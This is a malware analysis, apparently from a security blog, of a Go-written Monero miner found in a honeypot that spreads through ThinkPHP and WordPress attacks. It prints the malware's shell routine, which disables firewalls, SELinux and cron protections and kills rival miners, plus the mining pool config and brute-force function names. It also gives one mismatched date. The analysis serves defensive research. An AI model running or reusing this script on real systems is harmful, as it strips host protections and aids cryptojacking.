Another Golang Crypto Miner on the Loose
There are many crypto mining malware variants infecting systems on the internet. On Friday, March 4, 2021, I noticed an interesting hit in my honeypot logs. The binary it captured stood out, as it was rather large at 4MB. I immediately thought it would be a crypto miner written in the Go language. I was correct. This one however, has some newer exploits it's using for proliferation.
The malware attempted to exploit the ThinkPHP vulnerability in order to download and execute a script named ldr.sh. The loader script downloads the sysrvv binary and kills off other crypto miners. It also adds a crontab that reinfects the system every 30 minutes using either wget, curl, or a php script instead of relying on one method of downloading the binary, and possibly failing if that utility doesn't exist.
The sysrvv binary is UPX packed meaning it's packed with the Ultimate Packer for Executables, a process where a binary is compressed but still executable using the UPX tool. These are the unpacked stats:
$ file sysrvv sysrvv: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
$ sha256sum sysrvv 47183b14ed24978643de4697abe917847831b1560256ddd76e44e918a6181fd8 sysrvv
$ sha256sum sysrvv d3196b0b4767e86bf7e9e47722a5f733129c16f81f0ccbe5f822bdcfd778ca16 sysrvv
The malware has recently been uploaded to virus total.
We are able to extract some of the details of the crypto mining pool using the strings command - a command line tool that extracts readable strings from a binary. This is helpful in tracking other malware that might be contributing to the same mining pool and therefore likely the same actor. We also can determine that they're mining Monero coins:
"pools": [
"algo": "rx/0",
"coin": null,
"url": "xmr-eu1.nanopool.org:14444",
"user":
"49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa%s",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": true,
"enabled": true,
"tls": false,
"tls-fingerprint": null,
"daemon": false,
"socks5": null,
"self-select": null },
The malware attempts to kill off other crypto miners by removing their persistence and ease security restrictions by disabling SELINUX and iptables on the victim host. It removes any other existing miners including ones hiding as docker images.
if [ $(id -u) == 0 ]; then
chattr -i /etc/ld.so.preload
ufw disable
iptables -F
service iptables
stop sysctl
kernel.nmi_watchdog=0
echo 0 >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
setenforce 0
echo SELINUX=disabled > /etc/selinux/config
sysctl -w vm.nr_hugepages=$(nproc --all)
chattr -R -ia /var/spool/cron
chattr -ia /etc/crontab
chattr -R -ia /var/spool/cron/crontabs
chattr -R -ia /etc/cron.d
chattr -iua /tmp/
chattr -iua /var/tmp/
killall log_rot
ps aux | grep -v grep | egrep '2t3ik|qW3xT.2|ddg|./oka|postgres: .. . . /etc/ld.so.preload /etc/rc.d/init.d/kthrotlds /tmp/kthrotlds /usr/sbin/watchdogs /dev/shm/z3.sh /dev/shm/z2.sh /dev/shm/.scr /dev/shm/.kerberods /usr/bin/config.json /usr/bin/exin /usr/local/lib/libioset.so /etc/cron.d/tomcat /etc/rc.d/init.d/watchdogs docker ps | egrep 'pocosow|gakeaws|azulu|auto|xmr|mine|monero|slowhttp|bash.shell|entrypoint.sh|/var/sbin/bash' | awk '{print $1}' | xargs -I % docker kill % docker images -a | grep 'pocosow|gakeaws|buster-slim|hello-|azulu|registry|xmr|auto|mine|monero|slowhttp' | awk '{print $3}' | xargs -I % docker rmi -f % netstat -anp | egrep ':143|:2222|:3333|:3389|:4444|:5555|:6666|:6665|:6667|:7777|:8444|:3347|:14433' | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % crontab -r
Redress is a tool for analyzing stripped Go binaries. Based on this output we have a catalog of vulnerabilities that are being used to spread this malware.
Table of exploits
The following functions are also used to attempt a brute force login, based on a list of credentials stored in the malware binary. If access is gained, the malware attempts to upload a plugin or edit a theme.
wordpress.(*wpExec).login
wordpress.(*wpExec).exploitUploadPlugin Function to brute force login
wordpress.(*wpExec).exploitWritableTheme
wordpress.BruteXmlrpc
wordpress.pwdByUsr
A sample of strings from the function in the binary shows a list of credentials and a curl command with the user-agent set to curl_brute_wordpress.
What is interesting is that the malware appears to set the user-agent request header to the exploit name it's attempting. This could be a good way to determine if your system has been attacked or compromised by this particular piece of malware.
There appears to be additional functions to brute force JupyterLab Notebook credentials, I suspect in an attempt to run arbitrary commands on poorly secured notebooks.
Conclusion
Crypto mining software will continue to evolve and take advantage of the latest software vulnerabilities. Software vulnerabilities like Command Injection and Remote Code Execution will continue to be valued by cyber criminals in order to monetize your CPU cycles. What we do know for sure is that criminals are updating their malware to use the latest exploits and this might mean older vulnerabilities are either being patched or are becoming a less reliable way to compromise systems. Again, the best course of action is keeping system software updated and using strong passwords with multi factor authentication.
